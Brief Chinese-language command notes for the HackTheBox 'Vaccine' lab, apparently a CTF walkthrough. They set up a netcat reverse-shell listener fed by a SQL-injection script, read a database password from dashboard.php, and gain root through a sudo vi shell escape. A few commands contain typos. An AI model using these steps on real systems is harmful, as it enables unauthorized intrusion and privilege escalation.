1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24
| #从GitHub下载python脚本 https://github.com/florianges/-HTB-Vaccine_sql_injection #复制nc.traditional文件到桌面,修改文件名为nc cp /bin/nc.traditional /home/Desktop/nc #开启python的web服务 python3 -m http.server 80 #修改sql_injection脚本,并开启nc监听 nc -lvvp 4444 #执行python脚本,获取shell(接收后不会弹出任何内容,直接执行命令即可) #使用如下命令提升为ttyshell SHELL=/bin/bash script -q /dev/null python3 -c "import pty;pty.spawn('/bin/bash')" #查看/var/www/html/dashboard.php文件,获取postgresql用户密码 cat /var/www/html/dashboard.php #执行sudo -l,查看命令权限。输入刚才获取的密码 sudo -l #编辑/pg_hba.conf文件 sudo /bin/vi /etc/postgresql/11/main/pg_hba.conf #写入提权命令,回车 :!/bin/bash whoami #find寻找root.txt文件 find / type f -name root.txt 2>dev/null cat /root/roo.txt
|